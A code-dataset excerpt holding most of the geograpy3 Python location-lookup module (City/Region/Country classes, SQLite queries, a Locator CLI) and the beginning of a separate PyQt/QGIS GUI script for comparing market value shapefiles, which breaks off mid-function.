name=self.name if hasattr(self,\"name\") else \"?\"\n text = f\"{name} ({self.region} - {self.country})\"\n return text\n\n @staticmethod\n def fromCityLookup(cityLookupRecord:dict):\n '''\n\n create a city from a cityLookupRecord and setting City, Region and Country while at it\n Args:\n cityRecord(dict): a map derived from the CityLookup view\n\n '''\n # we create city, region and country from scratch without true\n # object relational mapping and lookup from the locationContext \n # this is only useful for small result sets that need no further interlinking\n city=City()\n # first take all params\n cityRecord=City.partialDict(cityLookupRecord,City)\n city.fromDict(cityRecord)\n\n regionRecord=City.mappedDict(cityLookupRecord,\n [(\"regionId\",\"wikidataid\"),(\"regionName\",\"name\"),(\"regionIso\",\"iso\"),(\"regionPop\",\"pop\"),(\"regionLat\",\"lat\"),(\"regionLon\",\"lon\")])\n city.region=Region.fromRecord(regionRecord)\n\n countryRecord=City.mappedDict(cityLookupRecord,\n [(\"countryId\",\"wikidataid\"),(\"countryName\",\"name\"),(\"countryIso\",\"iso\"),(\"countryLat\",\"lat\"),(\"countryLon\",\"lon\")])\n city.country=Country()\n city.country.fromDict(countryRecord)\n city.region.country=city.country\n return city\n \n def setValue(self, name, record):\n '''\n set a field value with the given name to\n the given record dicts corresponding entry or none\n \n Args:\n name(string): the name of the field\n record(dict): the dict to get the value from\n '''\n if name in record:\n value = record[name]\n else:\n value = None\n setattr(self, name, value)\n\n @property\n def country(self):\n return self._country\n\n @country.setter\n def country(self, country):\n self._country = country\n\n @property\n def region(self):\n return self._region\n\n @region.setter\n def region(self, region):\n self._region = region\n\n \nclass Region(Location):\n '''\n a Region (Subdivision)\n '''\n\n def __init__(self, **kwargs):\n super(Region, self).__init__(**kwargs)\n if not hasattr(self, 'level'):\n setattr(self, 'level', 4)\n if not hasattr(self, 'locationKind'):\n setattr(self,'locationKind', \"Region\")\n self._country = None\n\n @classmethod\n def getSamples(cls):\n samplesLOD = [{\n \"name\": \"California\",\n \"wikidataid\": \"Q99\",\n \"lat\": 37.0,\n \"lon\":-120.0,\n \"partOf\": \"US\",\n \"level\": 4,\n \"locationKind\": \"Region\",\n \"comment\": None,\n \"labels\": [\"CA\", \"California\"],\n \"iso\": \"US-CA\",\n \"country_wikidataid\": \"Q30\"\n }]\n return samplesLOD\n \n def __str__(self):\n text = f\"{self.iso}({self.name})\" \n return text\n\n @property\n def country(self):\n return self._country\n\n @country.setter\n def country(self, country):\n self._country = country\n\n @staticmethod\n def fromRegionLookup(regionLookupRecord: dict):\n '''\n\n create a region from a regionLookupRecord and setting Region and Country while at it\n Args:\n regionRecord(dict): a map derived from the CityLookup view\n '''\n # we create region and country from scratch without true\n # object relational mapping and lookup from the locationContext\n # this is only useful for small result sets that need no further interlinking\n region = Region()\n # first take all params\n regionRecord = Location.partialDict(regionLookupRecord, Region)\n region.fromDict(regionRecord)\n countryRecord = Location.mappedDict(regionLookupRecord,\n [(\"countryId\", \"wikidataid\"), (\"countryName\", \"name\"), (\"countryIso\", \"iso\"),\n (\"countryLat\", \"lat\"), (\"countryLon\", \"lon\")])\n region.country = Country()\n region.country.fromDict(countryRecord)\n return region\n\n\nclass Country(Location):\n '''\n a country\n '''\n\n def __init__(self, lookupSource='sqlDB', **kwargs):\n '''\n coonstruct me\n '''\n super(Country, self).__init__(**kwargs)\n if not hasattr(self, 'level'):\n setattr(self, 'level', 3)\n if not hasattr(self, 'locationKind'):\n setattr(self, 'locationKind', \"Country\")\n\n @classmethod\n def getSamples(cls):\n samplesLOD = [\n {\n 'wikidataid': 'Q38', \n 'name': 'Italy', \n 'iso': 'IT', \n 'pop': 60317000.0, \n 'lat': 42.5, \n 'lon': 12.5,\n },\n {\n \"name\": \"United States of America\",\n \"wikidataid\": \"Q30\",\n \"lat\": 39.82818,\n \"lon\":-98.5795,\n \"partOf\": \"North America\",\n \"level\": 3,\n \"locationKind\": \"Country\",\n \"comment\": None,\n \"labels\":[\"USA\", \"US\", \"United States of America\"],\n \"iso\":\"US\"\n }, {\n }]\n return samplesLOD\n\n def __str__(self):\n text = f\"{self.iso}({self.name})\" \n return text\n\n @staticmethod\n def fromCountryLookup(countryLookupRecord: dict):\n '''\n\n create a region from a regionLookupRecord and setting Region and Country while at it\n Args:\n regionRecord(dict): a map derived from the CityLookup view\n '''\n # we create region and country from scratch without true\n # object relational mapping and lookup from the locationContext\n # this is only useful for small result sets that need no further interlinking\n country = Country()\n countryRecord = Location.partialDict(countryLookupRecord, Region)\n country.fromDict(countryRecord)\n return country\n\n\nclass LocationContext(object):\n '''\n Holds LocationManagers of all hierarchy levels and provides methods to traverse through the levels\n '''\n db_filename=\"locations.db\"\n\n def __init__(self, countryManager:CountryManager, regionManager:RegionManager, cityManager:CityManager, config:StorageConfig):\n '''\n construct me\n \n Args:\n countryManager(CountryManager): the country manager to be used\n regionManager(RegionManager): the region manager to be used\n cityManager(CityManager): the city manager to be used\n '''\n self.countryManager = countryManager\n self.regionManager = regionManager\n self.cityManager = cityManager\n self.locator=Locator(storageConfig=config)\n\n def interlinkLocations(self,warnOnDuplicates:bool=True,profile=True):\n '''\n Interlinks locations by adding the hierarchy references to the locations\n \n Args:\n warnOnDuplicates(bool): if there are duplicates warn \n '''\n profile=Profiler(\"interlinking Locations\", profile=profile) \n duplicates=[]\n self._countryLookup, _dup = self.countryManager.getLookup(\"wikidataid\")\n duplicates.extend(_dup)\n self._regionLookup, _dup = self.regionManager.getLookup(\"wikidataid\")\n duplicates.extend(_dup)\n self._cityLookup, _dup = self.cityManager.getLookup(\"wikidataid\")\n duplicates.extend(_dup)\n if len(duplicates)>0 and warnOnDuplicates:\n print(f\"There are {len(duplicates)} duplicate wikidataids in the country,region and city managers used\")\n if self.debug:\n print(duplicates)\n # interlink region with country\n for region in self.regions:\n country = self._countryLookup.get(getattr(region, 'countryId'))\n if country is not None and isinstance(country, Country):\n region.country = country\n\n # interlink city with region and country\n for city in self.cities:\n country = self._countryLookup.get(getattr(city, 'countryId'))\n if country is not None and isinstance(country, Country):\n city.country = country\n region = self._regionLookup.get(getattr(city, 'regionId'))\n if region is not None and isinstance(region, Region):\n city.region = region\n _elapsed=profile.time()\n \n \n def load(self,forceUpdate:bool=False,warnOnDuplicates:bool=False):\n '''\n load my data\n '''\n for manager in self.countryManager,self.regionManager,self.cityManager:\n manager.fromCache(force=forceUpdate)\n self.interlinkLocations(warnOnDuplicates=warnOnDuplicates)\n \n\n @classmethod\n def fromCache(cls, config:StorageConfig=None, forceUpdate:bool=False):\n '''\n Inits a LocationContext form Cache if existent otherwise init cache\n\n Args:\n config(StorageConfig): configuration of the cache if None the default config is used\n forceUpdate(bool): If True an existent cache will be over written\n '''\n if config is None:\n config = cls.getDefaultConfig()\n if Download.needsDownload(config.cacheFile):\n LocationManager.downloadBackupFileFromGitHub(fileName=cls.db_filename,\n targetDirectory=config.getCachePath(),\n force=forceUpdate)\n cityManager = CityManager(\"cities\", config=config)\n regionManager = RegionManager(\"regions\", config=config)\n countryManager = CountryManager(\"countries\", config=config)\n locationContext = LocationContext(countryManager, regionManager, cityManager, config)\n return locationContext\n\n @staticmethod\n def getDefaultConfig() -> StorageConfig:\n '''\n Returns default StorageConfig\n '''\n config = StorageConfig(cacheFile=LocationContext.db_filename,cacheDirName=\"geograpy3\")\n config.cacheFile=f\"{config.getCachePath()}/{config.cacheFile}\"\n return config\n\n @property\n def countries(self) -> list:\n return self.countryManager.getList()\n\n @property\n def regions(self) -> list:\n return self.regionManager.getList()\n\n @property\n def cities(self) -> list:\n return self.cityManager.getList()\n\n def locateLocation(self, *locations, verbose:bool=False):\n '''\n Get possible locations for the given location names.\n Current prioritization of the results is city(ordered by population)→region→country\n ToDo: Extend the ranking of the results e.g. matching of multiple location parts increase ranking\n Args:\n *locations:\n verbose(bool): If True combinations of locations names are used to improve the search results. (Increases lookup time)\n\n Returns:\n\n '''\n if locations is None or locations is (None):\n return\n locationParts = []\n for location in locations:\n if location is not None:\n for locationPart in location.split(','):\n locationParts.append(locationPart)\n # Split locationParts even further\n lp=[]\n for locationPart in locationParts:\n parts=locationPart.split(' ')\n lp.extend(parts)\n # Spliting by space breakes the look up for cities such as 'Los Angeles'\n if verbose:\n numberParts=len(parts)\n if numberParts>1:\n lp.extend([f\"{parts[i]} {parts[i+1]}\" for i in range(numberParts-1)])\n # if numberParts > 2:\n # lp.extend([f\"{parts[i]} {parts[i + 1]} {parts[i + 2]}\" for i in range(numberParts - 2)])\n locationParts.extend(lp)\n locationParts=list(set(locationParts)) # remove duplicates\n\n cities=self.cityManager.getByName(*locationParts)\n regions = self.regionManager.getByName(*locationParts)\n countries = self.countryManager.getByName(*locationParts)\n\n # remove locations already identified by location in lower hierarchy\n getAttrValues=lambda locations, attr:[getattr(location,attr) for location in locations if hasattr(location, attr)]\n excludeRegionIds=getAttrValues(cities, 'regionId')\n regions=[region for region in regions if hasattr(region, 'wikidataid') and not region.wikidataid in excludeRegionIds]\n excludeCountryIds=[*getAttrValues(cities, \"countryId\"), *getAttrValues(regions, \"countryId\")]\n countries=[country for country in countries if hasattr(country, 'wikidataid') and not country.wikidataid in excludeCountryIds]\n\n # build final result in the order city→region→country\n cities.sort(key=lambda c: int(getattr(c, 'pop', 0)) if getattr(c, 'pop') is not None else 0, reverse=True)\n res = [*cities, *regions, *countries]\n return res\n\n\n\nclass Locator(object):\n '''\n location handling\n '''\n \n # singleton instance\n locator = None\n\n def __init__(self, db_file=None, correctMisspelling=False, storageConfig:StorageConfig=None, debug=False):\n '''\n Constructor\n \n Args:\n db_file(str): the path to the database file\n correctMispelling(bool): if True correct typical misspellings\n storageConfig(StorageConfig): the storage Configuration to use\n debug(bool): if True show debug information\n '''\n self.debug = debug\n self.correctMisspelling = correctMisspelling\n if storageConfig is None:\n storageConfig=LocationContext.getDefaultConfig()\n self.storageConfig=storageConfig\n if db_file is None:\n self.db_path = self.storageConfig.getCachePath()\n self.db_file = self.storageConfig.cacheFile\n else:\n self.db_file=db_file\n self.view = \"CityLookup\"\n self.loadDB()\n self.getAliases()\n self.dbVersion = \"2021-08-18 16:15:00\"\n \n @staticmethod\n def resetInstance():\n Locator.locator = None \n \n @staticmethod\n def getInstance(correctMisspelling=False, debug=False):\n '''\n get the singleton instance of the Locator. If parameters are changed on further calls\n the initial parameters will still be in effect since the original instance will be returned!\n \n Args:\n correctMispelling(bool): if True correct typical misspellings\n debug(bool): if True show debug information\n '''\n if Locator.locator is None:\n Locator.locator = Locator(correctMisspelling=correctMisspelling, debug=debug)\n return Locator.locator\n\n def normalizePlaces(self,places:list):\n '''\n normalize places\n\n Args:\n places(list) a list of places\n\n Return:\n list: stripped and aliased list of places\n '''\n nplaces=[]\n for place in places:\n place = place.strip()\n if place in self.aliases:\n place = self.aliases[place]\n nplaces.append(place)\n return nplaces\n\n def locateCity(self, places:list):\n '''\n locate a city, region country combination based on the given wordtoken information\n \n Args:\n places(list): a list of places derived by splitting a locality e.g. \"San Francisco, CA\"\n leads to \"San Francisco\", \"CA\"\n \n Returns:\n City: a city with country and region details\n '''\n # make sure the database is populated\n self.populate_db()\n country = None\n cities = []\n regions = []\n # loop over all word elements\n places=self.normalizePlaces(places)\n for place in places:\n foundCountry = self.getCountry(place)\n if foundCountry is not None:\n country = foundCountry\n foundCities = self.cities_for_name(place)\n cities.extend(foundCities)\n foundRegions = self.regions_for_name(place)\n regions.extend(foundRegions)\n foundCity = self.disambiguate(country, regions, cities)\n return foundCity\n\n @staticmethod\n def isISO(s):\n '''\n check if the given string is an ISO code (ISO 3166-2 code)\n see https://www.wikidata.org/wiki/Property:P300\n\n Returns:\n bool: True if the string might be an ISO Code as per a regexp check\n '''\n m = re.search(r\"^([A-Z]{1,2}\\-)?[0-9A-Z]{1,3}$\", s)\n result = m is not None\n return result\n \n def disambiguate(self, country, regions, cities, byPopulation=True): \n '''\n try determining country, regions and city from the potential choices\n \n Args:\n country(Country): a matching country found\n regions(list): a list of matching Regions found\n cities(list): a list of matching cities found\n \n Return:\n City: the found city or None\n '''\n if self.debug:\n print(\"countries: %s \" % country)\n print(\"regions: %s\" % \"\\n\\t\".join(str(r) for r in regions))\n print(\"cities: %s\" % \"\\n\\t\".join(str(c) for c in cities))\n foundCity = None\n # is the city information unique?\n if len(cities) == 1:\n foundCity = cities[0]\n else: \n if len(cities) > 1:\n if country is not None:\n for city in cities:\n if self.debug:\n print(\"city %s: \" % (city))\n if city.country.iso == country.iso:\n foundCity = city\n break\n if foundCity is None and len(regions) > 0:\n for region in regions:\n for city in cities:\n if city.region.iso == region.iso and not city.region.name == city.name:\n foundCity = city\n break\n if foundCity is not None:\n break\n if foundCity is None and byPopulation:\n foundCity = max(cities, key=lambda city:0 if city.pop is None else city.pop)\n pass\n \n return foundCity \n \n def cities_for_name(self, cityName):\n '''\n find cities with the given cityName\n \n Args:\n cityName(string): the potential name of a city\n \n Returns:\n a list of city records\n '''\n cities = []\n cityRecords = self.places_by_name(cityName, \"name\")\n for cityRecord in cityRecords:\n cities.append(City.fromCityLookup(cityRecord))\n return cities\n\n def regions_for_name(self, region_name):\n '''\n get the regions for the given region_name (which might be an ISO code)\n \n Args:\n region_name(string): region name\n \n Returns:\n list: the list of cities for this region\n '''\n regions = [] \n if self.isISO(region_name):\n columnName = \"iso\"\n else:\n columnName = 'name'\n query = f\"SELECT * from regions WHERE {columnName} = (?)\" \n params = (region_name,)\n regionRecords = self.sqlDB.query(query, params)\n for regionRecord in regionRecords:\n regions.append(Region.fromRecord(regionRecord))\n return regions \n \n def correct_country_misspelling(self, name):\n '''\n correct potential misspellings \n Args:\n name(string): the name of the country potentially misspelled\n Return:\n string: correct name of unchanged\n '''\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n with open(cur_dir + \"/data/ISO3166ErrorDictionary.csv\") as info:\n reader = csv.reader(info)\n for row in reader:\n if name == remove_non_ascii(row[0]):\n return row[2]\n return name\n\n def is_a_country(self, name):\n '''\n check if the given string name is a country\n \n Args:\n name(string): the string to check\n Returns:\n True: if pycountry thinks the string is a country\n '''\n country = self.getCountry(name)\n result = country is not None\n return result\n \n def getCountry(self, name):\n '''\n get the country for the given name \n Args:\n name(string): the name of the country to lookup\n Returns: \n country: the country if one was found or None if not\n '''\n if self.isISO(name):\n query=\"SELECT * FROM countries WHERE iso = (?)\"\"\"\n params=(name,)\n else:\n if self.correctMisspelling:\n name = self.correct_country_misspelling(name)\n query=\"\"\"SELECT * FROM countries \nWHERE name LIKE (?)\nOR wikidataid in (SELECT wikidataid FROM country_labels WHERE label LIKE (?))\"\"\"\n params=(name,name,)\n country = None\n self.populate_db()\n countryRecords=self.sqlDB.query(query,params)\n if len(countryRecords)==1:\n country=Country.fromRecord(countryRecords[0])\n pass\n return country\n \n def getView(self):\n '''\n get the view to be used\n \n Returns:\n str: the SQL view to be used for CityLookups e.g. CityLookup\n '''\n view = self.view\n return view\n \n def places_by_name(self, placeName, columnName):\n '''\n get places by name and column\n Args:\n placeName(string): the name of the place\n columnName(string): the column to look at\n '''\n if not self.db_has_data():\n self.populate_db()\n view = self.getView()\n query = f'SELECT * FROM {view} WHERE {columnName} = (?) ORDER BY pop DESC'\n params = (placeName,)\n cityLookupRecords = self.sqlDB.query(query, params)\n cityLookupRecords.sort(key=lambda cityRecord: float(cityRecord.get('pop')) if cityRecord.get('pop') is not None else 0.0,reverse=True)\n return cityLookupRecords\n \n \n def recreateDatabase(self):\n '''\n recreate my lookup database\n '''\n print(f\"recreating database ... {self.db_file}\")\n self.populate_db(force=True)\n \n \n def populate_db(self, force=False):\n '''\n populate the cities SQL database which caches the information from the GeoLite2-City-Locations.csv file\n \n Args:\n force(bool): if True force a recreation of the database\n '''\n hasData = self.db_has_data()\n if force:\n self.populate_Countries(self.sqlDB)\n self.populate_Regions(self.sqlDB)\n self.populate_Cities(self.sqlDB)\n self.createViews(self.sqlDB)\n self.populate_Version(self.sqlDB)\n \n elif not hasData:\n self.downloadDB()\n if not os.path.isfile(self.db_file):\n raise(f\"could not create lookup database {self.db_file}\")\n \n def downloadDB(self, forceUpdate:bool=False):\n '''\n download my database\n\n Args:\n forceUpdate(bool): force the overwriting of the existent file\n '''\n if Download.needsDownload(self.db_file) or forceUpdate:\n LocationManager.downloadBackupFileFromGitHub(fileName=LocationContext.db_filename,\n targetDirectory=self.storageConfig.getCachePath(),\n force=forceUpdate)\n self.loadDB()\n \n \n def populate_Version(self, sqlDB):\n '''\n populate the version table\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n versionList = [{\"version\":self.dbVersion}]\n entityInfo = sqlDB.createTable(versionList, \"Version\", \"version\", withDrop=True)\n sqlDB.store(versionList, entityInfo)\n \n def readCSV(self, fileName:str):\n '''\n read the given CSV file\n \n Args:\n fileName(str): the filename to read\n \n '''\n records = []\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n csvfile = f\"{cur_dir}/data/{fileName}\" \n with open(csvfile) as info:\n reader = csv.DictReader(info)\n for row in reader:\n records.append(row)\n return records\n \n def getAliases(self):\n '''\n get the aliases hashTable\n '''\n aliases = self.readCSV(\"aliases.csv\")\n self.aliases = {}\n for alias in aliases:\n self.aliases[alias['name']] = alias['alias']\n \n \n def populate_Countries(self, sqlDB):\n '''\n populate database with countries from wikiData\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n wikidata = Wikidata()\n countryList=wikidata.getCountries()\n wikidata.store2DB(countryList, \"countries\",primaryKey=None,sqlDB=sqlDB)\n \n def populate_Regions(self, sqlDB):\n '''\n populate database with regions from wikiData\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n wikidata = Wikidata()\n regionList=wikidata.getRegions()\n wikidata.store2DB(regionList, \"regions\", primaryKey=None, sqlDB=sqlDB)\n \n def populate_Cities(self, sqlDB):\n '''\n populate the given sqlDB with the Wikidata Cities\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n #wikidata = Wikidata()\n #wikidata.endpoint=\"https://confident.dbis.rwth-aachen.de/jena/wdhs/sparql\"\n #cityList=wikidata.getCities()\n #wikidata.store2DB(cityList, \"cities\",primaryKey=None,sqlDB=sqlDB)\n config=LocationContext.getDefaultConfig()\n regionManager = RegionManager(config=config)\n regionManager.fromCache()\n regionByIso,_dup=regionManager.getLookup(\"iso\")\n jsonFiles=CityManager.getJsonFiles(config)\n msg=f\"reading {len(jsonFiles)} cached city by region JSON cache files\"\n profiler=Profiler(msg)\n cityManager=CityManager(config=config)\n cityManager.getList().clear()\n for jsonFileName in jsonFiles:\n isoMatch = re.search(r\"/([^\\/]*)\\.json\", jsonFileName)\n if not isoMatch:\n print(f\"{jsonFileName} - does not match a known region's ISO code\")\n else:\n rIso=isoMatch.group(1)\n region=regionByIso[rIso]\n with open(jsonFileName) as jsonFile:\n cities4Region = json.load(jsonFile)\n for city4Region in cities4Region:\n city=City()\n city.fromDict(city4Region)\n if hasattr(city, \"regionId\"):\n city.partOfRegionId=city.regionId\n city.regionId=region.wikidataid\n cityManager.add(city)\n pass\n cityManager.store()\n profiler.time()\n \n def createViews(self, sqlDB):\n viewDDLs = [\"DROP VIEW IF EXISTS CityLookup\", \"\"\"\nCREATE VIEW CityLookup AS\nSELECT \n cl.label,\n ci.*,\n r.name as regionName ,r.iso as regionIso ,r.pop as regionPop,r.lat as regionLat, r.lon as regionLon,\n c.name as countryName,c.iso as countryIso,c.lat as CountryLat, c.lon as CountryLon\nFROM \ncity_labels cl\nJOIN cities ci on ci.wikidataid=cl.wikidataid\nJOIN regions r on ci.regionId=r.wikidataid\nJOIN countries c on ci.countryId=c.wikidataid\n\"\"\",\"DROP VIEW IF EXISTS RegionLookup\",\n\"\"\"CREATE VIEW RegionLookup AS\nSELECT \n rl.label,\n r.*,\n c.name as countryName,c.iso as countryIso,c.lat as CountryLat, c.lon as CountryLon\nFROM \nregion_labels rl\nJOIN regions r on rl.wikidataid=r.wikidataid\nJOIN countries c on r.countryId=c.wikidataid\n\"\"\",\"DROP VIEW IF EXISTS CountryLookup\",\n\"\"\"CREATE VIEW CountryLookup AS\nSELECT \n cl.label,\n c.*\nFROM \ncountry_labels cl\nJOIN countries c on cl.wikidataid=c.wikidataid\n\"\"\",\n\"DROP INDEX if EXISTS cityLabelByWikidataid\",\n\"CREATE INDEX cityLabelByWikidataid ON city_labels (wikidataid)\",\n\"DROP INDEX if EXISTS cityByWikidataid\",\n\"CREATE INDEX cityByWikidataid ON cities (wikidataid)\",\n\"DROP INDEX IF EXISTS cityByRegion\",\n\"CREATE INDEX cityByRegion ON cities (regionId)\",\n\"DROP INDEX IF EXISTS regionByCountry\",\n\"CREATE INDEX regionByCountry ON regions (countryId)\"]\n for viewDDL in viewDDLs:\n sqlDB.execute(viewDDL)\n \n def db_recordCount(self, tableList, tableName):\n '''\n count the number of records for the given tableName\n \n Args:\n tableList(list): the list of table to check\n tableName(str): the name of the table to check\n \n Returns\n int: the number of records found for the table \n '''\n tableFound = False\n for table in tableList:\n if table['name'] == tableName:\n tableFound = True\n break\n count = 0\n if tableFound: \n query = \"SELECT Count(*) AS count FROM %s\" % tableName\n countResult = self.sqlDB.query(query)\n count = countResult[0]['count']\n return count\n \n def db_has_data(self):\n '''\n check whether the database has data / is populated\n \n Returns:\n boolean: True if the cities table exists and has more than one record\n '''\n tableList = self.sqlDB.getTableList()\n hasCities = self.db_recordCount(tableList,\"cities\")>200000\n hasCountries = self.db_recordCount(tableList, \"countries\") > 200\n hasRegions = self.db_recordCount(tableList, \"regions\") > 3000\n hasVersion = self.db_recordCount(tableList, \"Version\") == 1\n versionOk = False\n if hasVersion:\n query = \"SELECT version from Version\"\n dbVersionList = self.sqlDB.query(query)\n versionOk = dbVersionList[0]['version'] == self.dbVersion\n # hasWikidataCities=self.db_recordCount(tableList,'City_wikidata')>100000\n ok = hasVersion and versionOk and hasCities and hasRegions and hasCountries\n return ok\n\n def loadDB(self):\n '''\n loads the database from cache and sets it as sqlDB property\n '''\n self.sqlDB = SQLDB(self.db_file, errorDebug=True)\n\n \n__version__ = '0.2.2'\n__date__ = '2020-09-26'\n__updated__ = '2021-11-29'\n\nDEBUG = 1\n\n \ndef main(argv=None): # IGNORE:C0111\n '''main program.'''\n\n if argv is None:\n argv = sys.argv\n else:\n sys.argv.extend(argv) \n \n program_name = os.path.basename(sys.argv[0])\n program_version = \"v%s\" % __version__\n program_build_date = str(__updated__)\n program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)\n program_shortdesc = __import__('__main__').__doc__.split(\"\\n\")[1]\n user_name = \"Wolfgang Fahl\"\n program_license = '''%s\n\n Created by %s on %s.\n Copyright 2020-2021 Wolfgang Fahl. All rights reserved.\n\n Licensed under the Apache License 2.0\n http://www.apache.org/licenses/LICENSE-2.0\n\n Distributed on an \"AS IS\" basis without warranties\n or conditions of any kind, either express or implied.\n\nUSAGE\n''' % (program_shortdesc, user_name, str(__date__))\n\n try:\n # Setup argument parser\n parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action=\"store_true\", help=\"if True show debug information\")\n parser.add_argument(\"-cm\", \"--correctSpelling\", dest=\"correctMisspelling\", action=\"store_true\", help=\"if True correct typical misspellings\")\n parser.add_argument(\"-db\", \"--recreateDatabase\", dest='recreateDatabase', action=\"store_true\", help=\"recreate the database\")\n parser.add_argument('-V', '--version', action='version', version=program_version_message)\n\n # Process arguments\n args = parser.parse_args()\n loc = Locator.getInstance(correctMisspelling=args.correctMisspelling, debug=args.debug)\n if args.recreateDatabase:\n loc.recreateDatabase()\n else:\n print (\"no other functionality yet ...\")\n \n except KeyboardInterrupt:\n ### handle keyboard interrupt ###\n return 1\n except Exception as e:\n if DEBUG:\n raise(e)\n indent = len(program_name) * \" \"\n sys.stderr.write(program_name + \": \" + repr(e) + \"\\n\")\n sys.stderr.write(indent + \" for help use --help\")\n return 2 \n\n \nif __name__ == \"__main__\":\n if DEBUG:\n sys.argv.append(\"-d\")\n sys.exit(main()) \n","repo_name":"somnathrakshit/geograpy3","sub_path":"geograpy/locator.py","file_name":"locator.py","file_ext":"py","file_size_in_byte":53378,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"3"} +{"seq_id":"35311200334","text":"# George Adams\n# October 6, 2022\n# Main code for processing market value data\n\nimport os, sys\nimport qgis\nimport qgis.core\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QStyle, QFileDialog, QDialog, QMessageBox, QSizePolicy\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem, QDoubleValidator, QIntValidator\nfrom PyQt5.QtCore import QVariant\nfrom PyQt5.Qt import Qt\n\nimport overlay\nimport utilities\nimport main_gui\n\n\n# ==========================================\n# create app and main window\n# =========================================\n\n\n\nqgis_prefix = os.getenv(\"QGIS_PREFIX_PATH\")\nqgis.core.QgsApplication.setPrefixPath(qgis_prefix, True)\nqgs = qgis.core.QgsApplication([], False)\nqgs.initQgis()\n\napp = QApplication(sys.argv)\n# set up main window\nmainWindow = QMainWindow()\nui = main_gui.Ui_MainWindow()\nui.setupUi(mainWindow)\n\nlayer_base = None\nlayer_comparison = None\nlayer_overlay = None\nlayer_result_file = None\nlayer_overlay_result_file = None\n\n# =======================================\n# GUI event handler and related functions\n# =======================================\n\ndef selectBaseShapefile():\n global layer_base\n \"\"\"open file dialog to select exising shapefile and if accepted, update GUI accordingly\"\"\"\n select_file, _ = QFileDialog.getOpenFileName(mainWindow, \"Select shapefile\", \"\", \"Shapefile (*.shp)\")\n if select_file:\n ui.baseLE.setText(select_file)\n layer_base = qgis.core.QgsVectorLayer(select_file)\n updateBaseCB()\n updateBaseParamCB()\n\ndef selectComparisonShapefile():\n global layer_comparison\n \"\"\"open file dialog to select exising shapefile and if accepted, update GUI accordingly\"\"\"\n select_file, _ = QFileDialog.getOpenFileName(mainWindow, \"Select shapefile\", \"\", \"Shapefile (*.shp)\")\n if select_file:\n ui.comparisonLE.setText(select_file)\n layer_comparison = qgis.core.QgsVectorLayer(select_file)\n updateComparisonCB()\n updateComparisonParamCB()\n\ndef selectOverlayShapefile():\n global layer_overlay\n \"\"\"open file dialog to select exising shapefile and if accepted, update GUI accordingly\"\"\"\n select_file, _ = QFileDialog.getOpenFileName(mainWindow, \"Select shapefile\", \"\", \"Shapefile (*.shp)\")\n if select_file:\n ui.overlayLE.setText(select_file)\n layer_overlay = qgis.core.QgsVectorLayer(select_file)\n #==>updateOverlayCB()\n\ndef selectNewResultGPKGfile():\n global layer_result_file\n \"\"\"open file dialog to creaete new shapefile and if accepted, update GUI accordingly\"\"\"\n new_file, _ = QFileDialog.getSaveFileName(mainWindow,\"Save new GeoPackage as\", \"\",\" (*.gpkg)\")\n if new_file:\n ui.resultLE.setText(new_file)\n layer_result_file = new_file\n\n\ndef selectNewOverlayResultGPKGfile():\n global layer_overlay_result_file\n \"\"\"open file dialog to creaete new shapefile and if accepted, update GUI accordingly\"\"\"\n new_file, _ = QFileDialog.getSaveFileName(mainWindow,\"Save new GeoPackage as\", \"\",\" (*.gpkg)\")\n if new_file:\n ui.resultOverlayLE.setText(new_file)\n layer_overlay_result_file = new_file\n\ndef resultToggle():\n if ui.resultCkB.isChecked():\n ui.resultLE.setEnabled(True)\n ui.resultTB.setEnabled(True)\n else:\n ui.resultLE.setEnabled(False)\n ui.resultTB.setEnabled(False)\n\ndef resultOverlayToggle():\n if ui.resultOverlayCkB.isChecked():\n ui.resultOverlayLE.setEnabled(True)\n ui.resultOverlayTB.setEnabled(True)\n else:\n ui.resultOverlayLE.setEnabled(False)\n ui.resultOverlayTB.setEnabled(False)\n\ndef updateBaseParamCB():\n global layer_base\n # Update base combobox after base shapefile is selected\n ui.baseParamCB.clear()\n\n try:\n ui.baseParamCB.addItems(utilities.getNumericFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Base Parameter ComboBox',\n 'Obtaining parameter list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\ndef updateBaseCB():\n global layer_base\n # Update base combobox after base shapefile is selected\n ui.baseCB.clear()\n\n try:\n ui.baseCB.addItems(utilities.getAllFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Base Unique ID ComboBox',\n 'Obtaining field list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\n\ndef updateComparisonParamCB():\n global layer_comparison\n # Update base combobox after base shapefile is selected\n ui.comparisonParamCB.clear()\n\n try:\n ui.comparisonParamCB.addItems(utilities.getNumericFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Comparison Parameter ComboBox',\n 'Obtaining parameter list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\ndef updateComparisonCB():\n global layer_comparison\n # Update comparison combobox after base shapefile is selected\n ui.comparisonCB.clear()\n\n try:\n ui.comparisonCB.addItems(utilities.getAllFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Comparison Unique ID ComboBox',\n 'Obtaining field list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\n\n\ndef processData():\n ui.statusbar.showMessage('Processing has started... please wait!')\n dict_base = {}\n dict_comparison = {}\n dict_overlay = {}\n global layer_base\n global layer_comparison\n global layer_overlay\n global layer_result_file\n global layer_overlay_result_file\n\n if layer_base is None:\n ui.statusbar.showMessage('Exiting... select the base layer')\n return\n if layer_comparison is None:\n ui.statusbar.showMessage('Exiting... select the comparison layer')\n return\n if layer_overlay is None:\n ui.statusbar.showMessage('Exiting... select the overlay layer')\n return\n if ui.resultCkB.isChecked():\n if layer_result_file is 